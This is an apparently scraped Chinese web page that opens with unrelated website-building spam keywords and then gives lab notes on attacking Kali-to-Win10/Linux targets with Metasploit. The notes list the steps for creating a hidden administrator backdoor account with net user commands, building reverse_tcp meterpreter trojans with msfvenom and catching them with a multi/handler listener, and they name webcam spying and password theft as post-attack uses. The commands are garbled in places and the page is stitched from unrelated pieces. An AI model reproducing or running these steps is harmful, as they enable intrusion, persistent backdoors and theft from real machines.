长春网站建设免费咨询,佛山企业网站排名,设计自学网,国产wordpress模板1.meterpreter 攻击成功后可以做什么指令#xff1f;
远程控制命令执行摄像头监控密码获取创建后门用户破坏篡改系统。 2.创建后门用户并开启远程连接#xff1a;
net user zhangsan 123456/add net localgroup adminstrators zhangsan/add
exit
run getgul -…1.meterpreter 攻击成功后可以做什么指令
远程控制命令执行摄像头监控密码获取创建后门用户破坏篡改系统。 2.创建后门用户并开启远程连接
net user zhangsan 123456/add net localgroup adminstrators zhangsan/add
exit
run getgul -e 3.攻击系统
①reverse_tcp是一个基于TCP的反向链接反弹shell, 使用起来很稳定
msfuse exploit/multi/handler
msf exploit(multi/handler)set payload linux/x86/meterpreter/reverse_tcp ②生成一个Linux下反弹shell木马
【报错】msfvenom -p linux/x86/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f elf -o shell 【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f elf shell ③目录下已经成功生成木马文件shell。
然后我们给文件加上可执行权限。成功设置后显示绿色
然后我们打开Metasploit使用模块handler设置payload注意这里设置的payload要和我们生成木马所使用的payload一样。
rootkali:~# ls
rootkali:~# chmod x shell
rootkali:~# ls
(ls:显示指定工作目录下之内容)
(chmod:控制用户对文件的权限的命令
chmod x:增加可执行权限在root权限下设置否则会报错) ④设置下地址和端口开始监听并运行
【报错】msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f exe -o shell.exe 【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f exe shell.exe ⑤输入以下指令指定监听攻击模块载荷IP端口 use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.195.129
set lport 10002
set rhost 192.168.195.130
exploit 注
端口被占用查出进程并杀掉
lsof -i:[端口号]
kill[进程号] 等待攻击完成ing会话卡死端口号不一致导致
重来 攻击机kali linux x64 目标机win10 x64 步骤
①sudo su
②kali
③msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f elf shell
④msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost192.168.195.129 lport4444 -f exe shell.exe
⑤msfconsole
⑥use exploit/multi/handler
⑦set payload windows/x64/meterpreter/reverse_tcp
⑧set LHOST 192.168.195.129
⑨set LPORT 4444
⑩run
【不需要】set RHOSTS 192.168.195.131